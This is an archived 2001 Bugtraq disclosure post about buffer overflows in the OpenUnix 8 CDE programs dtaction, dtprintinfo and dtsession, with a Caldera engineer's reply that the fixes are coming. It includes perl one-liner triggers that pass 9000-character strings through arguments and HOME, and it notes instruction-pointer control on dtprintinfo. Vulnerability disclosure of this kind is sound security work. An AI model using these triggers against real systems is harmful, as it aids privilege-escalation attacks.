[22103] in bugtraq
[Fwd: OpenUnix 8 dtaction dtprintinfo dtsession overflows]
daemon@ATHENA.MIT.EDU (KF)
Fri Aug 3 10:53:26 2001
Message-ID: <3B691AA8.1AF17A2A@snosoft.com>
Date: Thu, 02 Aug 2001 05:17:28 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: dtaction dtprintinfo dtsession overflows
Date: Wed, 01 Aug 2001 23:27:26 -0400
From: KF <dotslash@snosoft.com>
To: tigger@caldera.com, recon@snosoft.com
Bugtraq Bound...thought I would let ya know.
/usr/dt/bin/dtaction `perl -e 'print "A" x 9000'`
or
HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtaction
HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtprintinfo
(positive eip hit on this one)
HOME=`perl -e 'print "A" x 9000'`;/usr/dt/bin/dtsession
uname -a
OpenUNIX unixware8 5 8.0.0 i386 x86at Caldera UNIX_SVR5
-KF
-----------------------------------------------
Subject:
Re: dtaction dtprintinfo dtsession overflows
Date:
Thu, 2 Aug 2001 14:16:49 -0700
From:
tigger@caldera.com
To:
dotslash@snosoft.com
References:
1
To: dotslash@snosoft.com
We had already fixed the dtaction problem; the others are known but
not yet fixed. All fixes are due out soon.
Thanks,
Andrew